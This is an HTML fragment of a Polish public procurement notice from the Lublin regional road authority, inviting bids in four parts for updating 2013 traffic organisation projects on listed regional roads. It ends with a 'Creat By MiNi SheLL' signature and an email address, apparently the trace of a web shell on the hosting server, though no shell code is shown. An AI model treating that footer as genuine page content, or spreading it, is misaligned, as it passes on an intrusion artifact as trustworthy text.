W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Wydział Umów, Sławomir Szepietowski, tel. (081) 749-53-44; 749-53-29.
UWAGA: Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem (0-81) 749-53-77 lub pocztą elektroniczną na adres dzp@zdw.lublin.pl zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie aktualizacji projektów organizacji ruchu w 2013 roku dla odcinków dróg wojewódzkich zarządzanych przez ZDW w Lublinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - dr. nr 808 Łuków-Serokomla-Kock 36,551 km, dr. nr 814 Radzyń Podlaski-Suchowola-Żminne 20,928 km, dr. nr 818 Przewłoka-Wyryki-Adampol 40,598 km. Wartość zadania - 49.038,50 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie aktualizacji projektów organizacji ruchu w 2013 roku dla odcinków dróg wojewódzkich zarządzanych przez ZDW w Lublinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 - dr. nr 834 Bełżyce-Niedrzwica Duża-Bychawa-Stara Wieś III 34,461 km, dr. nr 836 Bychawa-Kębłów 25,978 km, dr. nr 829 Łęczna-Biskupice 18,172 km, dr. nr 838 Głębokie-Dorohucza-Trawniki-Fajsławice 24,797 km, dr. nr 839 Cyców-Siedliszcze-Marynin-Pawłów-Rejowiec 27,895 km. Wartość zadania - 65.651,50 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie aktualizacji projektów organizacji ruchu w 2013 roku dla odcinków dróg wojewódzkich zarządzanych przez ZDW w Lublinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 - dr. nr 846 Małochwiej Duży-Wojsławice-Teratyn 42,549 km, dr. nr 849 Zamość-Jacnia-Józefów-Wola Obszańska 55,633 km, dr. nr 852 Józefówka-Nowosiółki-Witków 35,549 km, dr. nr 867 (gr. województwa)-Hrebenne 6,210 km. Wartość zadania - 69.970,50 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie aktualizacji projektów organizacji ruchu w 2013 roku dla odcinków dróg wojewódzkich zarządzanych przez ZDW w Lublinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4 - dr. nr 863 (gr. województwa)-Tarnogród-Cieszanów 46,287 km, dr. nr 877 Naklik-(gr. województwa) 1,510 km, dr. nr 741 droga 738-Bronowice Łęka-rz.Wisła-Wólka Gołębska-droga 801 6,460 km, dr. nr 743 Góra Puławska-Karczunki-Sadłowice-Nasiłków-rz.Wisła-Bochotnica-droga 824 9,115 km, dr. nr 825 Kamień-Józefów 9,116 km, dr. nr 854 Annopol-Kosin-(gr. województwa) 14,273 km, dr. nr 855 Olbięcin-(gr. województwa) 10,964 km, dr. nr 857 (gr. województwa)-Modliborzyce 9,895 km. Wartość zadania - 53.810,00 zł netto..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com